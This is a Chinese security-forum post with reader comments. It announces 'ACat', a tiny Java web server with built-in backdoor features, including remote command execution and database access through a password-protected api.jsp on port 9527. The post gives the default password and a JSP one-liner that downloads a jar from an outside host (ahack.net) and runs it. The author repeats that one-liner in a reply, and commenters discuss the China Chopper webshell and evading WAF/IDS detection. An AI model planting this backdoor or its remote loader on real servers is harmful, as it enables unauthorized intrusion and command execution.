下载:

ACat-jdk1.5.jarACat-附数据库驱动-jdk1.5.jar

ACat.jarACat-附数据库驱动.jar

源码:ACat-src.zip

描述:

这是一个用java实现的非常小(18kb)的webServer。之前在drops发了一个简单的demo:http://drops.wooyun.org/papers/869。这个也非常简单,只实现了几个servlet的api,不过已实现了后门相关功能。启动成功后会开启9527端口,然后访问:http://xxx.com:9527/api.jsp,密码:023。

JDK编译版本:jdk1.5、jdk1.7。

停止服务:http://xxx.com:9527/api.jsp?action=stop

密码和端口配置在jar里面的server.properties:

密码和端口配置在jar里面的server.properties

运行方式:

java -jar ACat.jar或者在Jsp中调用:

<%
Class.forName("org.javaweb.server.Server",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("http://ahack.net/acat2.jar")})).getMethod("startX", new Class[]{}).invoke(null, new Object[]{});
%>

或在jsp里面执行本地命令:

java -jar xx.jar

或在jsp里面执行本地命令

执行命令:

执行命令

加载驱动后可以连接数据库:

加载驱动后可以连接数据库

FROM:http://p2j.cn/?p=1310

[原文地址]

各种吐槽:

1#

Mody | 2014-05-26 10:34

园长,一直好奇你的菜刀怎么在mac上跑的?

2#

Mody | 2014-05-26 10:34

二楼也是我的,顶园长

3#

园长 (乱码你好,乱码再见。) | 2014-05-26 10:36

@Mody 我这个是windows版,@xcoder 你等他把java版本写完吧。

4#

风情万种 | 2014-05-26 10:51

表示看不懂 咋办

5#

Knight (查水表。缴wb不杀) | 2014-05-26 11:39

比jspspy好吗?

6#

冷冷的夜 (预备唱:希望你过的没我好,死得比我早,吃不好也睡不) | 2014-05-26 11:50

菜刀的数据报各大waf,ips,ids已经能识别并且时时阻断,搂主高个加密的吧

7#

园长 (乱码你好,乱码再见。) | 2014-05-26 11:54

@冷冷的夜 这个知道,只能等小伙伴儿的跨平台版本菜刀发出来之后了。服务器端改太简单了,需要同时修改客户端。

8#

wefgod (求大牛指点) | 2014-05-26 12:39

@园长 xcoder 是菜刀作者?!

9#

爱上平顶山 (IT民工 职业搬砖 挖坑 丝一枚 神马都不会~) | 2014-05-26 12:48

@园长 园长发布 必属精品

10#

luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2014-05-26 14:54

我觉得园长屌爆了

11#

国士无双 (我来找快乐。) | 2014-05-26 15:01

我觉得园长屌爆了

12#

DarkY | 2014-05-26 15:15

或者在jsp里面调用。jsp里怎么调用?

13#

园长 (乱码你好,乱码再见。) | 2014-05-26 15:42

@DarkY

不好意思刚发的包版本有点高了,编译环境是jdk1.7。http://ahack.net/acat2.jar已调整为jdk1.5了。

执行一句话:

<%
Class.forName("org.javaweb.server.Server",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("http://ahack.net/acat2.jar")})).getMethod("startX", new Class[]{}).invoke(null, new Object[]{});
%>

14#

园长 (乱码你好,乱码再见。) | 2014-05-26 15:59

@爱上平顶山 更新了,之前发布的时候没考虑客户端jdk版本,现在做了jdk1.5版本兼容。

15#

scanf (学习) | 2014-05-26 17:30

园长NB!

16#

RedFree (‮1:1 1-1-1112 |※(器杀制自) | 2014-05-26 22:36

已用pyqt开始python版菜刀的仿写,但现在死在多标签上了。pyqt开发的相关资料好少,好多很简单的问题都找不到答案~

17#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-05-27 08:48

Good JB!